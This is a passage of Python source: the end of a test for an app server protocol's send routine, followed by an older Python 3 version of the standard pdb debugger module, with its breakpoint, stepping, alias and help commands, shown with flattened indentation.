assert next(generator).getValue() == value.value
def test_send_server(app_server, watcher):
event = return_value()
generator = app_server.protocol.send(event)
next(generator) # exec
assert watcher.wait('write')
assert app_server.write_data == str.encode(dump_event(event, 0) + '~~~')
assert app_server.write_sock == 'sock obj'
value = Value()
value.value = 'Hello client!'
value.errors = False
value.node_call_id = 0
app_server.protocol.add_buffer(str.encode(dump_value(value) + '~~~'))
assert next(generator).getValue() == value.value
|
|
#! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from reprlib import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
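# e.g. find_function('main', 'script.py') might return
# ('main', 'script.py', 10) when "def main(" first appears on line 10,
# or None if the file cannot be opened or the pattern never matches.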
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
bdb.Bdb.__init__(self)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = 0
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
rcFile = open(os.path.join(envHome, ".pdbrc"))
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
try:
rcFile = open(".pdbrc")
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
        # Per-breakpoint command lists and the flags controlling how they run.
        self.commands = {}  # maps a breakpoint number to its command list
        self.commands_doprompt = {}  # whether to prompt after running the list
        self.commands_silent = {}  # whether to suppress the stack entry printout
        self.commands_defining = False  # True while defining a command list
        self.commands_bnum = None  # breakpoint number whose list is being defined
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
self.rcLines = []
for line in rcLines:
line = line[:-1]
if len(line) > 0 and line[0] != '#':
self.onecmd(line)
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
print('--Call--', file=self.stdout)
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
            if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
                    or frame.f_lineno <= 0):
return
self._wait_for_mainpyfile = 0
if self.bp_commands(frame):
self.interaction(frame, None)
    def bp_commands(self, frame):
        """Call every command that was set for the currently active
        breakpoint (if there is one).
        Returns True if the normal interaction function must be called,
        False otherwise."""
        # self.currentbp is set in bdb.py's break_here if a breakpoint was hit.
        if getattr(self, "currentbp", False) and self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self.cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
frame.f_locals['__return__'] = return_value
print('--Return--', file=self.stdout)
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
exc_type, exc_value, exc_traceback = exc_info
frame.f_locals['__exception__'] = exc_type, exc_value
exc_type_name = exc_type.__name__
print(exc_type_name + ':', _saferepr(exc_value), file=self.stdout)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
self.cmdloop()
self.forget()
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
exec(code, globals, locals)
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
except:
t, v = sys.exc_info()[:2]
            if isinstance(t, str):
                exc_type_name = t
            else:
                exc_type_name = t.__name__
print('***', exc_type_name + ':', v, file=self.stdout)
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
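    # For example, with "alias ps pi self" defined, the input "ps ;; where"
    # first expands the alias (repeatedly, since "pi" may itself be an
    # alias) and then queues "where" as a separate follow-up command.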
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
    def handle_command_def(self, line):
        """Handle one command line during command list definition."""
cmd, arg, line = self.parseline(line)
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
        if arg:
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
        if func.__name__ in self.commands_resuming:  # one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
            except ValueError:
                print("Usage: commands [bnum]\n ...\n end", file=self.stdout)
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
self.cmdloop()
self.commands_defining = False
self.prompt = prompt_back
    def do_break(self, arg, temporary=0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print("Num Type Disp Enb Where", file=self.stdout)
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print('*** ', repr(filename), end=' ', file=self.stdout)
print('not found from sys.path', file=self.stdout)
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError as msg:
print('*** Bad lineno:', arg, file=self.stdout)
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, '__func__'):
func = func.__func__
code = func.__code__
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print('*** The specified object', end=' ', file=self.stdout)
print(repr(arg), end=' ', file=self.stdout)
print('is not a function', file=self.stdout)
print('or was not found along sys.path.', file=self.stdout)
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print('***', err, file=self.stdout)
else:
bp = self.get_breaks(filename, line)[-1]
print("Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line), file=self.stdout)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
line = linecache.getline(filename, lineno)
if not line:
print('End of file', file=self.stdout)
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
print('*** Blank or comment', file=self.stdout)
return 0
return lineno
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print('Breakpoint index %r is not a number' % i, file=self.stdout)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print('No breakpoint numbered', i, file=self.stdout)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print('Breakpoint index %r is not a number' % i, file=self.stdout)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print('No breakpoint numbered', i, file=self.stdout)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print('Breakpoint index %r is not a number' % args[0], file=self.stdout)
return
        try:
            cond = args[1]
        except IndexError:
            cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print('Breakpoint index %r is not valid' % args[0],
file=self.stdout)
return
if bp:
bp.cond = cond
if not cond:
print('Breakpoint', bpnum, end=' ', file=self.stdout)
print('is now unconditional.', file=self.stdout)
    def do_ignore(self, arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print('Breakpoint index %r is not a number' % args[0], file=self.stdout)
return
        try:
            count = int(args[1].strip())
        except (IndexError, ValueError):
            count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print('Breakpoint index %r is not valid' % args[0],
file=self.stdout)
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print(reply + ' of breakpoint %d.' % bpnum, file=self.stdout)
else:
print('Will stop next time breakpoint', end=' ', file=self.stdout)
print(bpnum, 'is reached.', file=self.stdout)
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print('***', err, file=self.stdout)
return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print('Breakpoint index %r is not a number' % i, file=self.stdout)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print('No breakpoint numbered', i, file=self.stdout)
continue
err = self.clear_bpbynumber(i)
if err:
print('***', err, file=self.stdout)
else:
print('Deleted breakpoint', i, file=self.stdout)
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print('*** Oldest frame', file=self.stdout)
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print('*** Newest frame', file=self.stdout)
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print("*** You can only jump within the bottom frame", file=self.stdout)
return
try:
arg = int(arg)
except ValueError:
print("*** The 'jump' command requires a line number.", file=self.stdout)
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError as e:
print('*** Jump failed:', e, file=self.stdout)
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print("ENTERING RECURSIVE DEBUGGER", file=self.stdout)
sys.call_tracing(p.run, (arg, globals, locals))
print("LEAVING RECURSIVE DEBUGGER", file=self.stdout)
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print(file=self.stdout)
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
print(name, '=', end=' ', file=self.stdout)
if name in dict: print(dict[name], file=self.stdout)
else: print("*** undefined ***", file=self.stdout)
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print(self.curframe.f_locals['__return__'], file=self.stdout)
else:
print('*** Not yet returned!', file=self.stdout)
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print('***', exc_type_name + ':', repr(v), file=self.stdout)
raise
def do_p(self, arg):
try:
print(repr(self._getval(arg)), file=self.stdout)
except:
pass
# make "print" an alias of "p" since print isn't a Python statement anymore
do_print = do_p
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
                if isinstance(x, tuple):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print('*** Error in argument:', repr(arg), file=self.stdout)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno)
if not line:
print('[EOF]', file=self.stdout)
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print(s + '\t' + line, end='', file=self.stdout)
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
            if isinstance(t, str):
                exc_type_name = t
            else:
                exc_type_name = t.__name__
print('***', exc_type_name + ':', repr(v), file=self.stdout)
return
code = None
# Is it a function?
        try: code = value.__code__
        except AttributeError: pass
if code:
print('Function', code.co_name, file=self.stdout)
return
# Is it an instance method?
        try: code = value.__func__.__code__
        except AttributeError: pass
if code:
print('Method', code.co_name, file=self.stdout)
return
# None of the above...
print(type(value), file=self.stdout)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
            keys = sorted(self.aliases.keys())
for alias in keys:
print("%s = %s" % (alias, self.aliases[alias]), file=self.stdout)
return
if args[0] in self.aliases and len(args) == 1:
print("%s = %s" % (args[0], self.aliases[args[0]]), file=self.stdout)
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print('>', end=' ', file=self.stdout)
else:
print(' ', end=' ', file=self.stdout)
print(self.format_stack_entry(frame_lineno,
prompt_prefix), file=self.stdout)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print("""h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command""", file=self.stdout)
def help_where(self):
self.help_w()
def help_w(self):
print("""w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command.""", file=self.stdout)
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print("""d(own)
Move the current frame one level down in the stack trace
(to a newer frame).""", file=self.stdout)
def help_up(self):
self.help_u()
def help_u(self):
print("""u(p)
Move the current frame one level up in the stack trace
(to an older frame).""", file=self.stdout)
def help_break(self):
self.help_b()
def help_b(self):
print("""b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted.""", file=self.stdout)
def help_clear(self):
self.help_cl()
def help_cl(self):
print("cl(ear) filename:lineno", file=self.stdout)
print("""cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.""", file=self.stdout)
def help_tbreak(self):
print("""tbreak same arguments as break, but breakpoint is
removed when first hit.""", file=self.stdout)
def help_enable(self):
print("""enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers.""", file=self.stdout)
def help_disable(self):
print("""disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers.""", file=self.stdout)
def help_ignore(self):
print("""ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true.""", file=self.stdout)
def help_condition(self):
print("""condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional.""", file=self.stdout)
def help_step(self):
self.help_s()
def help_s(self):
print("""s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function).""", file=self.stdout)
def help_until(self):
self.help_unt()
def help_unt(self):
print("""unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns""")
def help_next(self):
self.help_n()
def help_n(self):
print("""n(ext)
Continue execution until the next line in the current function
is reached or it returns.""", file=self.stdout)
def help_return(self):
self.help_r()
def help_r(self):
print("""r(eturn)
Continue execution until the current function returns.""", file=self.stdout)
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print("""c(ont(inue))
Continue execution, only stop when a breakpoint is encountered.""", file=self.stdout)
def help_jump(self):
self.help_j()
def help_j(self):
print("""j(ump) lineno
Set the next line that will be executed.""", file=self.stdout)
def help_debug(self):
print("""debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment).""", file=self.stdout)
def help_list(self):
self.help_l()
def help_l(self):
print("""l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count.""", file=self.stdout)
def help_args(self):
self.help_a()
def help_a(self):
print("""a(rgs)
Print the arguments of the current function.""", file=self.stdout)
def help_p(self):
print("""p(rint) expression
Print the value of the expression.""", file=self.stdout)
def help_pp(self):
print("""pp expression
Pretty-print the value of the expression.""", file=self.stdout)
def help_exec(self):
print("""(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)""", file=self.stdout)
    def help_run(self):
        print("""run [args...]
Restart the debugged python program. If a string is supplied, it is
split with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run".""", file=self.stdout)
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print("""q(uit) or exit - Quit from the debugger.
The program being executed is aborted.""", file=self.stdout)
help_exit = help_q
def help_whatis(self):
print("""whatis arg
Prints the type of the argument.""", file=self.stdout)
def help_EOF(self):
print("""EOF
Handles the receipt of EOF as a command.""", file=self.stdout)
def help_alias(self):
print("""alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' that executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print("%1.", k, "=", %1.__dict__[k])
#Print instance variables in self
alias ps pi self
""", file=self.stdout)
def help_unalias(self):
print("""unalias name
Deletes the specified alias.""", file=self.stdout)
def help_commands(self):
print("""commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
""", file=self.stdout)
def help_pdb(self):
help()
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
        # When bdb sets tracing, a number of call and line events happen
        # BEFORE the debugger even reaches the user's code (and the exact
        # sequence of events depends on the python version). So we take
        # special measures to avoid stopping before we reach the main script
        # (see user_line and user_call for details).
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
with open(filename) as fp:
statement = fp.read()
self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
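# Typical use of the simplified interface (assuming this module is
# importable as "pdb"):
#   import pdb; pdb.set_trace()   # break into the debugger right here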
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
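# e.g. to inspect the most recent uncaught exception from the REPL:
#   import pdb; pdb.pm()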
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
for dirname in sys.path:
fullname = os.path.join(dirname, 'pdb.doc')
if os.path.exists(fullname):
sts = os.system('${PAGER-more} '+fullname)
if sts: print('*** Pager exit status:', sts)
break
else:
print('Sorry, can\'t find the help file "pdb.doc"', end=' ')
print('along the Python search path')
def main():
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print("usage: pdb.py scriptfile [arg] ...")
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print('Error:', mainpyfile, 'does not exist')
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command which
# allows explicit specification of command line arguments.
pdb = Pdb()
while 1:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print("The program finished and will be restarted")
except Restart:
print("Restarting", mainpyfile, "with arguments:")
print("\t" + " ".join(sys.argv[1:]))
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print("The program exited via sys.exit(). Exit status: ", end=' ')
print(sys.exc_info()[1])
except:
traceback.print_exc()
print("Uncaught exception. Entering post mortem debugging")
print("Running 'cont' or 'step' will restart the program")
t = sys.exc_info()[2]
pdb.interaction(None, t)
print("Post mortem debugger finished. The "+mainpyfile+" will be restarted")
